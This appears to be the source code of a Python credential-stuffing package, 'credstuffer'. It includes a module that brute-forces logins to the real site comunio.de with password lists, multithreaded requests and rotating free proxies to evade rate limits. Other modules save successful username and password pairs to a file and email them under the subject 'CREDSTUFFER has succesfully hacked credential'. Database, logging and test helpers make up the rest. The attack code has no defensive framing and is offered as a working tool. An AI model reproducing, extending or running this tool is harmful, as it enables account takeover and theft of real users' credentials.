import os
import logging
import threading
from credstuffer.stuffer import Stuffer


class DirectoryStuffer(Stuffer, threading.Thread):
    """ class DirectoryStuffer to execute the stuffing algorithm with directories including dict files

    USAGE:
            dirstuffer = DirectoryStuffer(account=account, directory_path=/tmp/)
            dirstuffer.start()
    """
    def __init__(self, account, directory_path):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('Create class DirectoryStuffer')

        # init base class
        Stuffer.__init__(self, account=account)
        threading.Thread.__init__(self)

        if os.path.isdir(directory_path):
            self.directory_path = directory_path
        else:
            raise TypeError("Given path {} is not a directory".format(directory_path))

    def run(self) -> None:
        """ executes the run thread for account logins """

        # set proxy to account
        self.set_account_proxy()

        # iterate through dirs and load each file
        self.logger.info("Load files from directory {}".format(self.directory_path))
        for root, subdirs, files in os.walk(self.directory_path):
            for file in files:
                filepath = os.path.join(root, file)
                if os.path.isfile(filepath):
                    self.logger.info("Open file {} for stuffing".format(filepath))
                    # get passwords from file
                    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                        for lineno, line in enumerate(f):
                            password = line.strip('\n')
                            # execute login
                            self.account_login(password=password)
                            if (lineno % 2000) == 0:
                                self.logger.info("File {} with line number {} and password {}".format(file, lineno, password))
                else:
                    self.logger.error("File: {} is not a regular file".format(filepath))




import logging
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

from credstuffer import UserAccount
from credstuffer.exceptions import ProxyNotSetError, ProxyMaxRequestError, ProxyBadConnectionError, InternetConnectionError


class Comunio(UserAccount):
    """ class Comunio to provide basic methods for credstuffing comunio.de

    USAGE:
            comunio = Comunio(max_requests=10000, notify='mail', **kwargs)

    """
    usernames = list()

    def __init__(self, max_requests=10000, notify=None, **kwargs):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class Comunio')
        self.name = 'Comunio'

        # init base class
        super().__init__(name=self.name, notify=notify, **kwargs)

        self.headers.update({
            'Origin': 'http://www.comunio.de',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Referer': 'http://www.comunio.de/home',
            })
        self.comunio_login_url = 'https://api.comunio.de/login'
        self.max_requests = max_requests
        self.request_counter = 0

    def set_usernames(self, usernames):
        """ sets usernames for comunio account

        :param usernames: list of usernames
        """
        if isinstance(usernames, list):
            self.usernames.extend(usernames)
        else:
            self.usernames.append(usernames)

    def remove_username(self, username):
        """ removes the given username from the usernames list

        :param username: username string
        """
        self.logger.info("Remove username {} from list".format(username))
        try:
            self.usernames.remove(username)
        except ValueError as ex:
            self.logger.error("Could not remove the username {} from list: {}".format(username, ex))

    def login(self, password):
        """ requests given login data to the account

        """

        # check if proxy is set
        if self.session.proxies:

            # check if we need a new proxy
            if self.request_counter < self.max_requests:

                with ThreadPoolExecutor(max_workers=len(self.usernames)) as executor:

                    future_response = {executor.submit(self.__request_login, user, password): user for user in self.usernames}
                    for i, future in enumerate(as_completed(future_response)):
                        user = future_response[future]
                        statuscode = future.result().status_code

                        if (self.request_counter % len(self.usernames)) == 0:
                            self.logger.info("response code: {} from comunio with username: {}, password: {}, proxy: {}"
                                         .format(statuscode, user, password, self.session.proxies['http']))

                        if statuscode == 200:
                            self.send_notification(username=user, password=password)
                            self.remove_username(username=user)
                        if statuscode == 500:
                            self.logger.error(future.result().text)
            else:
                # raise Error to renew Proxy
                self.request_counter = 0
                self.logger.error("Max number of proxy requests reached!. Renew Proxy")
                raise ProxyMaxRequestError("Max number of proxy requests reached!")
        else:
            raise ProxyNotSetError("No Proxy was set!")

    def __request_login(self, username, password):
        """ request login with an session object

        :return: Request response object
        """
        login_form = [('username', username), ('password', password), ]

        try:
            request_login = self.session.post(self.comunio_login_url, headers=self.headers, data=login_form,
                                              timeout=self.login_request_timeout, allow_redirects=False)
            
            self.request_counter += 1

        except requests.exceptions.RequestException as ex:
            if self.is_internet_available():
                raise ProxyBadConnectionError("Proxy Bad Connection: Exception: {}".format(ex))
            else:
                raise InternetConnectionError("InternetConnectionError: {}".format(ex))

        return request_login

    def set_proxy(self, proxy):
        """ sets a proxy

        """
        if isinstance(proxy, dict):
            self.logger.info("set proxy to {}".format(proxy['http']))
            self.session.proxies = proxy
        else:
            raise TypeError("proxy must be type of dictionary!")



import os
import time
import logging
from datetime import datetime
from logging.handlers import RotatingFileHandler
from credstuffer import ROOT_DIR


class Logger:
    """Singleton class Logger to set up a Logger instance
    USAGE:
            Logger(name='credstuffer')
    """
    __instance = None

    def __init__(self, account='', name='credstuffer', level='info', log_folder='/var/log/', log_max_bytes=10000000,
                 backup=5):

        if Logger.__instance is not None:
            raise Exception("This class is a singleton!")
        else:
            Logger.__instance = self

        if isinstance(name, str):
            self.logger_name = name
            self.logger = logging.getLogger(name)
        else:
            raise TypeError("'name' must be type of string")

        self.account_name = account

        if level == 'info':
            self.level = logging.INFO
        elif level == 'debug':
            self.level = logging.DEBUG
        elif level == 'warn':
            self.level = logging.WARN
        elif level == 'error':
            self.level = logging.ERROR
        else:
            # default level
            self.level = logging.INFO

        self.logger.setLevel(self.level)
        self.formatter = logging.Formatter('%(asctime)s - %(lineno)d@%(filename)s - %(levelname)s: %(message)s')

        self.local_log = ROOT_DIR + '/logs'

        datetime_obj = datetime.fromtimestamp(time.time())
        date_str = str(datetime_obj.date())
        time_str = str(datetime_obj.time()).split('.')[0]

        if self.__create_log_folder(log_folder):

            info_log_file_path = log_folder + '/' + self.logger_name + '/info_' + self.account_name + '_' + date_str + \
                                 '_' + time_str + '_' + '.log'
            error_log_file_path = log_folder + '/' + self.logger_name + '/error_' + self.account_name + '_' + date_str \
                                  + '_' + time_str + '_' + '.log'
            self.set_up_handler(log_max_bytes, info_log_file_path, error_log_file_path, backup)

        elif self.__create_log_folder(self.local_log):

            info_log_file_path = self.local_log + '/' + self.logger_name + '/info_' + self.account_name + '_' + \
                                 date_str + '_' + time_str + '_' + '.log'
            error_log_file_path = self.local_log + '/' + self.logger_name + '/error_' + self.account_name + '_' + \
                                  date_str + '_' + time_str + '_' + '.log'
            self.set_up_handler(log_max_bytes, info_log_file_path, error_log_file_path, backup)

        else:
            print("could not create a logger instance")

    @staticmethod
    def get_instance():
        """ get logger instance

        :return: Logger: logger instance
        """
        if Logger.__instance is None:
            Logger()
        return Logger.__instance

    def __create_log_folder(self, log_folder):
        """creates log folder in '/var/log/credstuffer'

        :return bool, True if log folder was successfully created
        """
        try:
            if log_folder.endswith('/'):
                if not os.path.exists(log_folder):
                    os.mkdir(log_folder)
                if not os.path.exists(log_folder + self.logger_name):
                    os.mkdir(log_folder + self.logger_name)
                    return True
                else:
                    return True
            else:
                if not os.path.exists(log_folder):
                    os.mkdir(log_folder)
                if not os.path.exists(log_folder + '/' + self.logger_name):
                    os.mkdir(log_folder + '/' + self.logger_name)
                    return True
                else:
                    return True

        except PermissionError as ex:
            print("Check permission for folder {}! Exception: {}".format(log_folder, ex))
            return False

    def set_up_handler(self, log_file_size, info_log_file_path, error_log_file_path, backup):
        """ sets up the logger handler

        """
        stream_handler = logging.StreamHandler()
        stream_handler.setLevel(self.level)
        stream_handler.setFormatter(self.formatter)

        info_rotate_handler = RotatingFileHandler(info_log_file_path, mode='a', maxBytes=log_file_size, backupCount=backup)  # 10mb
        info_rotate_handler.setFormatter(self.formatter)
        info_rotate_handler.setLevel(logging.DEBUG)  # fixed level

        error_rotate_handler = RotatingFileHandler(error_log_file_path, mode='a', maxBytes=log_file_size, backupCount=backup)  # 10mb
        error_rotate_handler.setFormatter(self.formatter)
        error_rotate_handler.setLevel(logging.WARNING)  # fixed level

        self.logger.addHandler(stream_handler)
        self.logger.addHandler(info_rotate_handler)
        self.logger.addHandler(error_rotate_handler)

    def info(self, msg):
        """logs info messages

        :param msg: string messages
        """
        self.logger.info(msg)

    def debug(self, msg):
        """logs debug messages

        :param msg: string messages
        """
        self.logger.debug(msg)

    def warning(self, msg):
        """logs warning messages

        :param msg: string messages
        """
        self.logger.warning(msg)

    def error(self, msg):
        """logs error messages

        :param msg: string messages
        """
        self.logger.error(msg)




import logging
from abc import abstractmethod

from credstuffer import Account


class EmailAccount(Account):
    """ Base class EmailAccount to provide basic methods for accounts with email accounts

    USAGE:
            eaccount = EmailAccount()

    """
    def __init__(self):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class EmailAccount')

        # init base class
        super().__init__()

    @abstractmethod
    def login(self, email, password):
        """ abstract method login

        :return: None or request Response
        """
        pass



import unittest
import psycopg2
from credstuffer.db.connector import DBConnector


class TestDBConnector(unittest.TestCase):

    def setUp(self) -> None:

        # set up DBConnector instance
        self.connector = DBConnector()
        self.connector.connect_psycopg(host="127.0.0.1", port=5432, username="postgres", password="postgres", dbname="postgres")

    def test_get_cursor(self):

        with self.connector.get_cursor() as cursor:
            self.assertIsInstance(cursor, psycopg2.extensions.cursor, msg="cursor must be type of psycopg2.extensions.cursor")

    def test_get_conn(self):

        with self.connector.get_conn() as conn:
            self.assertIsInstance(conn, psycopg2.extensions.connection, msg="conn must be type of psycopg2.extensions.connection")

    def tearDown(self) -> None:
        pass


if __name__ == '__main__':
    unittest.main()



import ssl
import logging
import smtplib
from email.message import EmailMessage

from credstuffer.exceptions import MailMessageError


class Mail:
    """ class Mail to provide sending credentials to specific email address

    USAGE:
            mail = Mail(smtp_server="smtp.web.de", port=587, debug=False)
            mail.login(username='', password='')
            mail.send(username, password, receiver)
    """
    def __init__(self, smtp_server, port, debug=False):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class Mail')

        self.smtp_server = smtp_server
        self.port = port
        self.sender = None
        self.__password = None
        self.server = smtplib.SMTP(self.smtp_server, self.port)  # implicit connecting to server
        self.context = ssl.create_default_context()
        self.server.starttls(context=self.context)

        if debug:
            self.server.set_debuglevel(True)

        self.msg = None

    def connect(self, smtp_server, port):
        """ connects to the smtp server with given port

        :param smtp_server: smtp server host
        :param port: port
        """
        self.logger.info("Connect to mail server")
        self.server.connect(host=smtp_server, port=port)

        self.context = ssl.create_default_context()
        self.server.starttls(context=self.context)

    def login(self, username, password):
        """ login to email account with username and password

        :return True if login was successful, else False
        """
        try:
            ret = self.server.login(user=username, password=password)
        except smtplib.SMTPServerDisconnected as ex:
            self.logger.error("Server disconnected, connecting again: {}".format(ex))
            self.connect(smtp_server=self.smtp_server, port=self.port)
            return self.login(username=username, password=password)
        return ret[0] == 235  # authentication was successful

    def quit(self):
        """ quits the server connection cleanly

        """
        self.server.quit()

    def new_message(self):
        """ creates a new EmailMessage object

        """
        self.msg = EmailMessage()

    def set_subject(self, subject):
        """ sets the subject for the email

        :param subject: subject in email
        """
        if self.msg is not None:
            self.msg['Subject'] = subject
        else:
            raise MailMessageError("No Mail Message was set! Call 'new_message' first")

    def set_body(self, body):
        """ sets the body for the email

        :param body: body content in email
        """
        if self.msg is not None:
            self.msg.set_content(body)
        else:
            raise MailMessageError("No Mail Message was set! Call 'new_message' first")

    def send(self, username, password, receiver):
        """ sends the email to the receiver

        """
        if self.msg is not None:
            self.msg['From'] = username
            self.msg['To'] = receiver
            try:
                self.connect(smtp_server=self.smtp_server, port=self.port)

                if self.login(username=username, password=password):
                    self.logger.info("Authentication to Mail Server was successful")
                    self.server.sendmail(username, receiver, self.msg.as_string())
                else:
                    self.logger.error("Authentication to Mail Server failed!")
            except (smtplib.SMTPRecipientsRefused, smtplib.SMTPSenderRefused) as ex:
                self.logger.error("Failed to send the mail: {}".format(ex))
            finally:
                self.quit()

            self.msg.clear()
        else:
            raise MailMessageError("No Mail Message was set! Call 'new_message' first")




import unittest
from credstuffer.db.inserter import DBInserter
from credstuffer.db.creator import DBCreator, Table, Column
from credstuffer.db.connector import DBConnector


class TestDBCreator(unittest.TestCase):

    def setUp(self) -> None:

        # set up DBConnector instance
        DBConnector().connect_psycopg(host="127.0.0.1", port=5432, username="postgres", password="postgres", dbname="postgres")
        self.inserter = DBInserter()
        self.creator = DBCreator()
        self.creator.build(obj=Table("test", Column(name="id", type="bigint"),
                                             Column(name="username", type="text")))

    def test_database(self):
        pass

    def test_schema(self):
        pass

    def test_table(self):

        self.table_str = Table("test", Column(name="id", type="bigint"),
                                       Column(name="id2", type="text")).__repr__()

        self.assertIsInstance(self.table_str, str, msg="table creation must be type of string")
        self.assertEqual(self.table_str, "create table if not exists test (id bigint , id2 text )", msg="table creation string is faulty")

    def test_column(self):

        self.colum_str = Column(name="id", type="bigint").__repr__()

        self.assertIsInstance(self.colum_str, str, msg="colum creation must be type of string")
        self.assertEqual(self.colum_str, "id bigint ", msg="colum creation string is faulty")

    def tearDown(self) -> None:

        sql = "delete from test"
        self.inserter.sql(sql=sql)


if __name__ == '__main__':
    unittest.main()



import logging
from abc import abstractmethod

from credstuffer import Account
from credstuffer.notification import Mail, Telegram


class UserAccount(Account):
    """ Base class UserAccount to provide basic methods for accounts with username accounts

    USAGE:
            useracc = UserAccount(name="Instagram",notify=notify, **kwargs)
            useracc.send_notification(username="abc", password="test")
    """
    def __init__(self, name=None, notify=None, **kwargs):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class UserAccount')

        # init base class
        super().__init__()

        self.name = name
        self.notify = notify

        self.credential_file = self.filename + self.name
        self.mail = None

        if self.notify is not None:
            if 'mail' in self.notify:

                if ( ('smtp' and 'port' and 'sender' and 'receiver' and 'password') in kwargs.keys() ) and \
                        all([val is not None for val in kwargs.values()]):
                    self.smtp = kwargs.get('smtp')
                    self.port = kwargs.get('port')
                    self.sender = kwargs.get('sender')
                    self.password = kwargs.get('password')
                    self.receiver = kwargs.get('receiver')
                    self.mail = Mail(smtp_server=kwargs.get('smtp'), port=kwargs.get('port'))
        else:
            self.logger.info("No credential notification configured")

    @abstractmethod
    def set_usernames(self, usernames):
        """ abstract method set_usernames

        :param usernames: list of usernames
        """
        pass

    @abstractmethod
    def remove_username(self, username):
        """ remove username from usernames list

        :param username: username string
        """
        pass

    @abstractmethod
    def login(self, password):
        """ abstract method login

        :return: None or request Response
        """
        pass

    def send_notification(self, username, password):
        """ saves and sends a notification in success case

        :param username: string username
        :param password: string password
        """
        try:
            with open(self.root_dir + '/' + self.credential_file + '.txt', 'a') as file:
                self.logger.info("writing credential (username: {}, password: {}) to file {}".format(username, password,
                                                                                                     self.credential_file))
                file.write("username: {}, password: {}\n".format(username, password))
        except PermissionError as e:
            self.logger.error("Could not create credential file! Error: {}".format(e))

        if self.mail is not None:
            self.mail.new_message()
            self.mail.set_subject("CREDSTUFFER: Credential Notification!")
            mail_content = "CREDSTUFFER has succesfully hacked credential from account {}\n\nUsername: {}\nPassword: {}"\
                           .format(self.name, username, password)
            self.mail.set_body(mail_content)
            self.logger.info("send credential mail: {}".format(mail_content))
            self.mail.send(username=self.sender, password=self.password, receiver=self.receiver)



import sqlite3
import logging
from credstuffer.db.context import SQLiteCursorContextManager, SQLiteConnectionContextManager
from credstuffer.exceptions import DBConnectorError


class SQLite:
    """ class SQLite for connection to sqlite database

    USAGE:
            SQLite.connect(path="database.db")

    """
    connection = None

    def __init__(self):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info("create class SQLite")

    def __del__(self):
        """ destructor

        """
        SQLite.connection.close()

    @classmethod
    def connect(cls, path):
        """ connects to a local database file

        :param path: path to database file
        """
        try:
            cls.connection = sqlite3.connect(path, isolation_level=None)

        except sqlite3.DatabaseError as ex:
            logging.getLogger('credstuffer').error("Could not connect to SQLite Database: {}".format(ex))

    def get_cursor(self):
        """ get a cursor object

        :return: SQLiteCursorContextManager
        """
        if SQLite.connection is not None:
            return SQLiteCursorContextManager(conn=SQLite.connection)
        else:
            raise DBConnectorError("SQLite.connection was not defined!")

    def get_conn(self):
        """ get a connection object

        :return: SQLiteConnectionContextManager
        """
        if SQLite.connection is not None:
            return SQLiteConnectionContextManager(conn=SQLite.connection)
        else:
            raise DBConnectorError("SQLite.connection was not defined!")

    def commit(self):
        """ commits the current transaction

        """
        if SQLite.connection is not None:
            SQLite.connection.commit()
        else:
            raise DBConnectorError("SQLite.connection was not defined!")



import unittest
from credstuffer.notification import Mail


class TestMail(unittest.TestCase):

    def setUp(self) -> None:

        # set up Mail instance
        #self.mail = Mail()
        pass

    def tearDown(self) -> None:
        pass


if __name__ == '__main__':
    unittest.main()





class DBConnectorError(ConnectionError):
    """DBConnectorException"""
    pass


class DBCreatorError(Exception):
    """DBCreatorException"""
    pass


class DBInserterError(Exception):
    """DBInserterException"""
    pass


class DBIntegrityError(Exception):
    """DBIntegrityError"""
    pass


class ProxyNotSetError(Exception):
    """ProxyNotSetError"""
    pass


class ProxyMaxRequestError(Exception):
    """ProxyMaxRequestError"""
    pass


class ProxyBadConnectionError(Exception):
    """ProxyBadConnectionError"""
    pass


class InternetConnectionError(ConnectionError):
    """InternetConnectionError"""
    pass


class MailMessageError(Exception):
    """MailMessageError"""
    pass


class AccountInstanceError(Exception):
    """AccountInstanceError"""
    pass



import unittest


class TestInstagram(unittest.TestCase):

    def setUp(self) -> None:

        # set up Instagram instance
        pass


    def tearDown(self) -> None:
        pass


if __name__ == '__main__':
    unittest.main()





class PostgresqlCursorContextManager:
    """ class CursorContextManager to create the cursor object within a context

    USAGE:
            PostgresqlCursorContextManager(pool=pool, autocommit=False)

    """
    def __init__(self, pool, autocommit=False):
        self.pool = pool
        self.autocommit = autocommit
        self.conn = None

    def __enter__(self):
        """ implicit enter context for a cursor object generated from ThreadedConnectionPool

        :return: cursor object
        """

        self.conn = self.pool.getconn()
        self.conn.autocommit = self.autocommit
        self.cursor = self.conn.cursor()

        return self.cursor

    def __exit__(self, exc_type, exc_val, exc_tb):
        """ implicit exit context to cleanly execute commit/rollback on current connection object

        :param exc_type: exception type
        :param exc_val: exception value
        :param exc_tb: exception traceback
        """

        if not self.conn.closed:
            if (exc_type and exc_val and exc_tb) is None:
                self.conn.commit()
            else:
                self.conn.rollback()

            # set False as default
            self.conn.autocommit = False
            self.cursor.close()
            self.pool.putconn(self.conn)


class PostgresqlConnectionContextManager:
    """ class ConnectionContextManager to create the connection object within a context

    USAGE:
            PostgresqlConnectionContextManager(pool=pool, autocommit=False)

    """
    def __init__(self, pool, autocommit=False):
        self.pool = pool
        self.autocommit = autocommit

    def __enter__(self):
        """ implicit enter context for a connection object generated from ThreadedConnectionPool

        :return: connection object
        """

        self.conn = self.pool.getconn()
        self.conn.autocommit = self.autocommit

        return self.conn

    def __exit__(self, exc_type, exc_val, exc_tb):
        """ implicit exit context to cleanly execute rollback on current connection object

        :param exc_type: exception type
        :param exc_val: exception value
        :param exc_tb: exception traceback
        """
        if not self.conn.closed:
            self.conn.rollback()
            self.conn.autocommit = False
            self.pool.putconn(self.conn)


class SQLiteCursorContextManager:
    """ class SQLiteCursorContextManager to create the cursor object within a context

    USAGE:
            SQLiteCursorContextManager(conn=SQLite.connection)

    """
    def __init__(self, conn):
        self.conn = conn

    def __enter__(self):
        """ implicit enter context for a cursor object generated form SQLite Database

        :return: cursor object
        """
        return self.conn.cursor()

    def __exit__(self, exc_type, exc_val, exc_tb):
        """ implicit exit context to cleanly execute commit on current connection object

        :param exc_type: exception type
        :param exc_val: exception value
        :param exc_tb: exception traceback
        """
        self.conn.commit()


class SQLiteConnectionContextManager:
    """ class SQLiteConnectionContextManager to create the connection object within a context

    USAGE:
            SQLiteConnectionContextManager(conn=SQLite.connection)

    """
    def __init__(self, conn):
        self.conn = conn

    def __enter__(self):
        """ implicit enter context for a connection object generated form SQLite Database

        :return: connection object
        """
        return self.conn

    def __exit__(self, exc_type, exc_val, exc_tb):
        """ implicit exit context to cleanly execute commit on current connection object

        :param exc_type: exception type
        :param exc_val: exception value
        :param exc_tb: exception traceback
        """
        self.conn.commit()



import logging
from credstuffer.db import DBConnector, DBFetcher, DBInserter


class DBHandler:
    """ Base class DBHandler to provide database actions to subclasses

    USAGE:
            dbhandler = DBHandler()

    """
    def __init__(self, **dbparams):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class DBHandler')

        if ('host' and 'port' and 'username' and 'password' and 'dbname') in dbparams.keys():
            self.db_host = dbparams['host']
            self.db_port = dbparams['port']
            self.db_username = dbparams['username']
            self.db_password = dbparams['password']
            self.db_name = dbparams['dbname']

            DBConnector.connect_psycopg(host=self.db_host, port=self.db_port, username=self.db_username,
                                        password=self.db_password, dbname=self.db_name, minConn=1, maxConn=39)

            # database instances
            self.dbfetcher = DBFetcher()
            self.dbinserter = DBInserter()

            # database schema structure
            self.dbstructure = '0123456789abcdefghijklmnopqrstuvwxyz'
            self.schema_list_default = list(self.dbstructure)
            self.schema_list_default.append('symbols')
            self.table_list_default = self.schema_list_default

            self.schema_list = None
            self.table_list = None

        else:
            self.logger.error("no database params provided!")

    def fetch_data(self, schema, table):
        """ fetch data from database table 'schema'.'table'

        :param schema: schema name
        :param table: table name

        :return: data from database table
        """
        sql = "select * from \"{}\".\"{}\"".format(schema, table)

        return self.dbfetcher.all(sql=sql)


if __name__ == '__main__':
    pass
    #db = DBHandler(**dbparams)
    #db.fetch_data("a", "g")



import logging
from credstuffer.db.connector import DBConnector, Error
from credstuffer.exceptions import DBInserterError, DBIntegrityError


class DBInserter(DBConnector):
    """ class DBInserter to insert data into the database

    USAGE:
            inserter = DBInserter()
            inserter.connect(host, port, username, password, dbname, minConn=1, maxConn=10)
            inserter.row(sql=sql, data=(3, "test", 5))

    """
    def __init__(self):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class DBInserter')

        # init connector base class
        super().__init__()

    def sql(self, sql, autocommit=False):
        """ executes a sql statement

        :param sql: sql statement
        :param autocommit: bool to enable autocommit
        """
        with self.get_cursor(autocommit=autocommit) as cursor:
            cursor.execute(sql)

    def one(self):
        """ insert one entry in a row

        """
        pass

    def row(self, sql, data, autocommit=False):
        """ insert one row into database table

                sql= INSERT INTO comunio (id, username, wealth) VALUES (%s, %s, %s)
                data = (13, "test", 353.24)

                row(sql=sql, data=data)

        :param sql: sql statement
        :param data: data as a set
        :param autocommit: bool to enable autocommit
        """
        with self.get_cursor(autocommit=autocommit) as cursor:
            if self.is_sqlite:
                sql = sql.replace('%s', '?')
            try:
                cursor.execute(sql, data)
            except Error as e:
                if e.pgcode == '23505':

                    raise DBIntegrityError(e)

    def many_rows(self, sql, datas, autocommit=False):
        """ insert many rows into database table

                sql= INSERT INTO comunio (id, username, wealth) VALUES (%s, %s, %s)
                datas = [(13, "test", 353.24), (14, "test2", 400.02)]

                many_rows(sql=sql, datas=datas)

        :param sql: sql statement
        :param datas: data as a list
        :param autocommit: bool to enable autocomm
        """
        if isinstance(datas, list):
            with self.get_cursor(autocommit=autocommit) as cursor:
                if self.is_sqlite:
                    sql = sql.replace('%s', '?')
                try:
                    cursor.executemany(sql, datas)
                except Error as e:
                    if e.pgcode == '23505':
                        raise DBIntegrityError(e)
        else:
            raise DBInserterError("'datas' must be type of list")





import logging
import sqlite3
from credstuffer.db.context import PostgresqlCursorContextManager, PostgresqlConnectionContextManager, \
    SQLiteCursorContextManager, SQLiteConnectionContextManager
from credstuffer.exceptions import DBConnectorError
try:
    import psycopg2
    from psycopg2.pool import ThreadedConnectionPool
    from psycopg2 import Error
    is_psycopg2_importable=True
except ImportError as ex:
    is_psycopg2_importable=False
    print(ex)


class DBConnector:
    """ Base class DBConnector for connection to database

    USAGE:
            connector = DBConnector()
            connector.connect(host, port, username, password, dbname, minConn=1, maxConn=10)
    """
    # class attributes for connection and pool
    connection = None
    pool = None
    is_sqlite = False

    def __init__(self):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class DBConnector')

    @classmethod
    def connect_psycopg(cls, host, port, username, password, dbname, minConn=1, maxConn=10):
        """ connection to the ThreadedConnectionPool

        :param host: hostname of database
        :param port: port of database
        :param username: username for connection
        :param password: password for connection
        :param dbname: database name for connection
        :param minConn: minimum connections
        :param maxConn: maximum connections
        """
        try:
            if is_psycopg2_importable:
                # create connection pool
                cls.pool = ThreadedConnectionPool(minconn=minConn, maxconn=maxConn, user=username,
                                                  password=password, host=host, port=port, database=dbname)
            else:
                print("psycogp2 is not imported")
        except psycopg2.DatabaseError as e:
            logging.getLogger('credstuffer').error('Could not connect to ThreadedConnectionPool: {}'.format(e))

    @classmethod
    def connect_sqlite(cls, path):
        """ connection to the sqlite database

        :param path: path to database file
        """

        try:

            cls.connection = sqlite3.connect(path, isolation_level=None, check_same_thread=False)
            cls.is_sqlite = True

        except sqlite3.DatabaseError as ex:
            logging.getLogger('credstuffer').error('Could not connect to sqlite Database: {}'.format(ex))

    def get_cursor(self, autocommit=False):
        """ get a cursor object from ConnectionPool

        :param autocommit: bool to enable autocommit
        :return: cursor object
        """
        if self.pool is not None:
            return PostgresqlCursorContextManager(self.pool, autocommit=autocommit)
        elif self.connection is not None:
            return SQLiteCursorContextManager(self.connection)
        else:
            raise DBConnectorError("Database connection is not defined")

    def get_conn(self, autocommit=False):
        """ get a connection object from ConnectionPool

        :param autocommit: bool to enable autocommit
        :return: connection object
        """
        if self.pool is not None:
            return PostgresqlConnectionContextManager(self.pool, autocommit=autocommit)
        elif self.connection is not None:
            return SQLiteConnectionContextManager(self.connection)
        else:
            raise DBConnectorError("Database connection is not defined")

    def commit(self):
        """ commits a sql statement

        """
        with self.get_conn() as conn:
            conn.commit()





import logging
import requests
from random import choice, seed


class Proxy:
    """ class Proxy to provide multiple proxies to request the accounts

    USAGE:
            proxy = Proxy(timeout_ms=50)
            proxy.get()

    """
    def __init__(self, timeout_ms=50):
        self.logger = logging.getLogger('credstuffer')
        self.logger.info('create class Proxy')

        self.timeout_ms = timeout_ms
        self.timeout_counter = 1
        self.seed = seed(1)
        self.headers = {'User-Agent': 'Mozilla/5.0'}
        self.session = requests.Session()
        self.proxies = self.load_proxies(timeout=self.calc_timeout(timeout_ms=self.timeout_ms))
        self.logger.info("Loaded {} proxies with timeout of {} ms".format(len(self.proxies), self.timeout_ms))

    def __del__(self):
        """destructor"""

        self.session.close()

    def get(self):
        """ returns a proxy

        :return: one proxy as ip:port
        """

        if len(self.proxies) > 0:
            proxy = choice(self.proxies)
            self.proxies.remove(proxy)
            return proxy
        else:
            timeout_ms = self.calc_timeout(timeout_ms=self.timeout_ms)
            self.proxies = self.load_proxies(timeout_ms)
            self.logger.info("Loaded {} proxies with timeout of {} ms".format(len(self.proxies), timeout_ms))
            return self.get()

    def load_proxies(self, timeout):
        """ loads proxies with given timeout from proxyscrape

        :return: list of proxies as ip:port
        """
        proxyscrape_url = self.__build_proxyscrape_url(timeout=timeout)
        response = self.__request(url=proxyscrape_url)

        return list(filter(None, response.content.decode('utf-8').split('\r\n')))

    def calc_timeout(self, timeout_ms):
        """ raises the timeout to fetch more proxies from webpage

        :param timeout_ms: timeout in ms
        :return: timeout_ms
        """
        timeout_ms = timeout_ms * self.timeout_counter
        self.timeout_counter += 1

        return timeout_ms

    def __request(self, url):
        """ requests the proxyscrape url

        :return: request response
        """
        return self.session.get(url=url, headers=self.headers)

    def __build_proxyscrape_url(self, proxytype='all', timeout=1000, ssl='all', anonymity='all', country='all'):
        """ defines the proxyscrape url

        :param proxytype: type of proxy
        :param timeout: timeout for proxies
        :param ssl: ssl proxy
        :param anonymity: anonymity proxy
        :param country: country for proxy
        :return: url string
        """
        if proxytype not in ('http', 'socks4', 'socks5', 'all'):
            raise ValueError('proxytype {} is not a valid value'.format(proxytype))

        if timeout <= 0:
            raise ValueError('timeout must be an integer greater than 0')

        if ssl not in ('yes', 'no', 'all'):
            raise ValueError('ssl is not valid')

        if anonymity not in ('elite', 'anonymous', 'transparent', 'all'):
            raise ValueError('anonymity is not valid')

        if len(country) != 2 and country != 'all':
            raise ValueError('country is not valid')

        url = 'https://api.proxyscrape.com?request=getproxies' + \
              '&proxytype=%s' % proxytype + \
              '&timeout=%s'   % timeout + \
              '&ssl=%s'       % ssl + \
              '&anonymity=%s' % anonymity + \
              '&country=%s'   % country

        return url




import unittest
from credstuffer.accounts import Comunio


class TestComunio(unittest.TestCase):

    def setUp(self) -> None:

        # set up Comunio instance
        self.comunio = Comunio(max_requests=10)

    def test_set_usernames(self):

        self.comunio.set_usernames(usernames=['abc', 'abcd', 'abcde'])
        usernames = self.comunio.usernames

        self.assertIsInstance(usernames, list, msg="usernames must be type of list")
        self.assertEqual(len(usernames), 3, msg="wrong length of usernames")

    def test_login(self):
        pass

    def test_set_proxy(self):

        self.comunio.set_proxy(proxy={'http': '188.166.83.13:3128'})
        proxy = self.comunio.session.proxies

        self.assertIsInstance(proxy, dict, msg="proxy must be type of dictionary")
        self.assertEqual(proxy['http'], '188.166.83.13:3128', msg="proxy not set")

    def tearDown(self) -> None:
        pass


if __name__ == '__main__':
    unittest.main()



__title__ = "credstuffer"
__version_info__ = ('1', '0', '5')
__version__ = ".".join(__version_info__)
__author__ = "Christian Bierschneider"
__email__ = "christian.bierschneider@web.de"
__license__ = "MIT"

import os
from credstuffer.account import Account
from credstuffer.user_account import UserAccount
from credstuffer.email_account import EmailAccount
from credstuffer.proxy import Proxy

ROOT_DIR = os.path.dirname(os.path.abspath(__file__))



import unittest
from credstuffer.db.fetcher import DBFetcher
from credstuffer.db.inserter import DBInserter
from credstuffer.db.creator import DBCreator, Table, Column
from credstuffer.db.connector import DBConnector


class TestDBFetcher(unittest.TestCase):

    def setUp(self) -> None:

        # set up DBConnector instance
        DBConnector().connect_psycopg(host="127.0.0.1", port=5432, username="postgres", password="postgres", dbname="postgres")
        self.fetcher = DBFetcher()
        self.inserter = DBInserter()
        self.creator = DBCreator()
        self.creator.build(obj=Table("test", Column(name="id", type="bigint"),
                                             Column(name="username", type="text")))

        sql = "insert into test (id, username) values (%s, %s)"
        self.inserter.many_rows(sql=sql, datas=[(0, "abc"), (1, "def"), (2, "ghi")])

    def test_one(self):

        sql = "select * from test"
        one_row = self.fetcher.one(sql=sql)

